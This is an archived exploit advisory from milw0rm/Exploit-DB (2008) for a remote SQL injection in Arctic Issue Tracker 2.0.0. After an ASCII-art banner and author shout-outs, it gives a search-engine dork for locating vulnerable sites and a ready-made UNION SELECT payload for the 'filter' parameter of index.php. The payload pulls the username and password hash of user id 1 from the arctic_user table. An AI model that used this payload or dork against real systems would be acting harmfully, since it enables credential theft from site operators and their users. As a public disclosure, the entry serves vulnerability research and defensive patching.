Arctic Issue Tracker 2.0.0 - 'filter' SQL Injection (1)

EDB-ID:

6097

Author:

QTRinux

Type:

webapps

Platform:

PHP

Published:

2008-07-17

 IloveYouTryaG
|-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=|
|     _                   __           __       __          ______     |
|   /' \            __  /'__`\        /\ \__  /'__`\       /\  ___\    |
|  /\_, \    ___   /\_\/\_\L\ \    ___\ \ ,_\/\ \/\ \  _ __\ \ \__/    |
|  \/_/\ \ /' _ `\ \/\ \/_/_\_<_  /'___\ \ \/\ \ \ \ \/\`'__\ \___``\  |
|     \ \ \/\ \/\ \ \ \ \/\ \L\ \/\ \__/\ \ \_\ \ \_\ \ \ \/ \/\ \L\ \ |
|      \ \_\ \_\ \_\_\ \ \ \____/\ \____\\ \__\\ \____/\ \_\  \ \____/ |
|       \/_/\/_/\/_/\ \_\ \/___/  \/____/ \/__/ \/___/  \/_/   \/___/  |
|                  \ \____/ >> Kings of injection                      |
|                   \/___/                                             |
|-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=|
Title  ::   Remote SQL Injection
 
Author ::   QTRinu x [ Qataro (at) hotmail (dot) Com ]
Application  ::  Arctic Issue Tracker v2.0.0
 
Download ::   http://www.arctictracker.com
Price    ::  $99.95 USD
Dork 1   ::  Powered by Arctic v2.0.0
 
ShoutZ   :: Allah ,InJecTor,AlQaTaRi,all InjEctOr5 TeaM ,TrYaG TeaM & Muslims Hackers
Terms of use :: This exploit is just for educational purposes, DO NOT use it for illegal acts.
--------------------------------------------[C o n t e x t]-----------------------------------------
 
Vulnerability: http:// Localhost / (Path Script) / index.php?filter= [SQL]

SQL  : -1%20union%20select%201,2,3,concat(username,0x3a,password),5%20from%20arctic_user%20where%20id=1--
 
-------------------------------------------[End of  context]----------------------------------------
thanx str0ke/*

# milw0rm.com [2008-07-17]